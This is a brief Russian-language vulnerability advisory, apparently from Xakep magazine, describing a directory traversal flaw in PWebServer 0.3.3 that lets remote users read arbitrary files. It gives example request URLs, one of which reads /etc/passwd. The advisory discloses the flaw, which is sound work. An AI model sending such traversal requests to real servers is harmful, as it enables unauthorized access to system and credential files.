Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Программа: PWebServer 0.3.3
Уязвимость обнаружена в PWebServer. Удаленный пользователь может просматривать произвольные файлы на системе.
Пример:
http://[host]:6789/../someFile
http://[host]:6789/../../../../etc/passwd